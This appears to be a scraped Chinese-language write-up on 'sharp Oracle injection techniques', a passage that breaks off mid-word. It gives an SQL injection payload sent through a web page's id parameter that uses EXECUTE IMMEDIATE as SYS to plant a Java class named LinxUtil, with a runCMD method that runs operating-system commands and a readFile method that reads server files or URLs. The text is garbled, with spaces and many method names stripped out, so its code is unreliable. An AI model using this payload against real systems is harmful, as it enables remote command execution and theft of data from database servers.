犀利的oracle注入技术.doc

。以下的演示都是在web上的sqlplus执行的,.....改成/?id=1and'1'<>'a'||(.....)的形式即可。(用"'a'||"是为了让语句返回true值)语句有点长,可能要用post提交。以下是各个步骤:,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:/?id=1and'1'<>'a'||(('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTEIMMEDIATE''DECLAREPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE''''"LinxUtil".*;lassLinxUtilextendsObject{publicstaticStringrunCMD(Stringargs){try{BufferedReadermyReader=newBufferedReader(newInputStreamReader(().exec(args).getInputStream()));Stringstemp,str="";while((stemp=())!=null)str+=stemp+"\n";();returnstr;}catch(Exceptione){();}}publicstaticStringreadFile(Stringfilename){try{BufferedReadermyReader=newBufferedReader(newFileReader(filename));Stringstemp,str="";while((stemp=())!=null)str+=stemp+"\n";();returnstr;}catch(Exceptione){();}}}'''';END;'';END;--','SYS',0,'1',0)fromdual)************('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTEIMMEDIATE''DECLAREPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE''''pilejavasourcenamed"LinxUtil".*;.URL;{publicstaticStringrunCMD(Stringargs){try{BufferedReadermyReader=newBufferedReader(newInputStreamReader(().exec(args).getInputStream()));Stringstemp,str="";while((stemp=())!=null)str+=stemp+"\n";();returnstr;}catch(Exceptione){();}}publicstaticStringreadFile(Stringfilename){try{BufferedReadermyReader=newBufferedReader(("http")?newInputStreamReader(newURL(filename).openStream()):newFileReader(filename));Stringstemp,str="";wh